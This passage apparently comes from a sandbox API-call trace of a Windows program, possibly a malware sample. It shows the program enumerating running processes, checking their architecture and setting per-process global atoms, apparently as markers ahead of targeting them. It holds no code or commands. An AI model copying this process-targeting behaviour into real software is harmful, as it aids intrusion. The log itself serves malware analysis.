	[0098.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0098.083] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.083] CloseHandle (hObject=0x248) returned 1
	[0098.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0098.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0098.083] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.083] CloseHandle (hObject=0x248) returned 1
	[0098.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fed8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0098.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0098.083] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.083] CloseHandle (hObject=0x248) returned 1
	[0098.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0098.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0098.083] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.083] CloseHandle (hObject=0x248) returned 1
	[0098.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658f68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0098.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0098.084] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.084] CloseHandle (hObject=0x248) returned 1
	[0098.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0098.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0098.084] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.084] CloseHandle (hObject=0x248) returned 1
	[0098.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0098.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0098.084] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.084] CloseHandle (hObject=0x248) returned 1
	[0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0098.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0098.085] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.085] CloseHandle (hObject=0x248) returned 1
	[0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x6589c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0098.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0098.085] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.085] CloseHandle (hObject=0x248) returned 1
	[0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0098.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0098.085] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.085] CloseHandle (hObject=0x248) returned 1
	[0098.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0098.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0098.086] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.086] CloseHandle (hObject=0x248) returned 1
	[0098.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658e68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0098.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0098.086] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.086] CloseHandle (hObject=0x248) returned 1
	[0098.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0098.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0098.086] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.086] CloseHandle (hObject=0x248) returned 1
	[0098.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658dc8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0098.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0098.087] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.087] CloseHandle (hObject=0x248) returned 1
	[0098.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0098.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0098.087] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.087] CloseHandle (hObject=0x248) returned 1
	[0098.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0098.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0098.087] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.087] CloseHandle (hObject=0x248) returned 1
	[0098.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0098.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.088] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.089] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.089] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.089] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.090] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetLastError () returned 0x5
	[0098.091] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.092] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.092] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.092] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.092] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.092] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.092] CloseHandle (hObject=0x248) returned 1
	[0098.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0098.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0098.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0098.093] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.093] CloseHandle (hObject=0x248) returned 1
	[0098.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ada8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0098.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0098.093] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.093] CloseHandle (hObject=0x248) returned 1
	[0098.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0098.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16778) returned 0xc0000004
	[0098.224] VirtualAlloc (lpAddress=0x0, dwSize=0x16878, flAllocationType=0x3000, flProtect=0x4) returned 0x2c30000
	[0098.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c30000, Length=0x16878, ResultLength=0x0 | out: SystemInformation=0x2c30000, ResultLength=0x0) returned 0x0
	[0098.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2c0
	[0098.229] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.229] CloseHandle (hObject=0x2c0) returned 1
	[0098.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2c0
	[0098.230] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.230] CloseHandle (hObject=0x2c0) returned 1
	[0098.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2c0
	[0098.230] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.230] CloseHandle (hObject=0x2c0) returned 1
	[0098.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2c0
	[0098.230] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.230] CloseHandle (hObject=0x2c0) returned 1
	[0098.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2c0
	[0098.230] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.230] CloseHandle (hObject=0x2c0) returned 1
	[0098.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2c0
	[0098.231] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.231] CloseHandle (hObject=0x2c0) returned 1
	[0098.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2c0
	[0098.231] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.231] CloseHandle (hObject=0x2c0) returned 1
	[0098.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2c0
	[0098.231] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.231] CloseHandle (hObject=0x2c0) returned 1
	[0098.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2c0
	[0098.231] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.231] CloseHandle (hObject=0x2c0) returned 1
	[0098.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2c0
	[0098.231] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.231] CloseHandle (hObject=0x2c0) returned 1
	[0098.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2c0
	[0098.232] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.232] CloseHandle (hObject=0x2c0) returned 1
	[0098.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2c0
	[0098.232] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.232] CloseHandle (hObject=0x2c0) returned 1
	[0098.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2c0
	[0098.254] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.254] CloseHandle (hObject=0x2c0) returned 1
	[0098.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2c0
	[0098.254] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.254] CloseHandle (hObject=0x2c0) returned 1
	[0098.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2c0
	[0098.254] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.254] CloseHandle (hObject=0x2c0) returned 1
	[0098.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2c0
	[0098.254] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.255] CloseHandle (hObject=0x2c0) returned 1
	[0098.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2c0
	[0098.255] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.255] CloseHandle (hObject=0x2c0) returned 1
	[0098.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2c0
	[0098.255] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.255] CloseHandle (hObject=0x2c0) returned 1
	[0098.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2c0
	[0098.255] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.255] CloseHandle (hObject=0x2c0) returned 1
	[0098.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2c0
	[0098.255] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.255] CloseHandle (hObject=0x2c0) returned 1
	[0098.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2c0
	[0098.255] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.255] CloseHandle (hObject=0x2c0) returned 1
	[0098.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2c0
	[0098.256] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.256] CloseHandle (hObject=0x2c0) returned 1
	[0098.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2c0
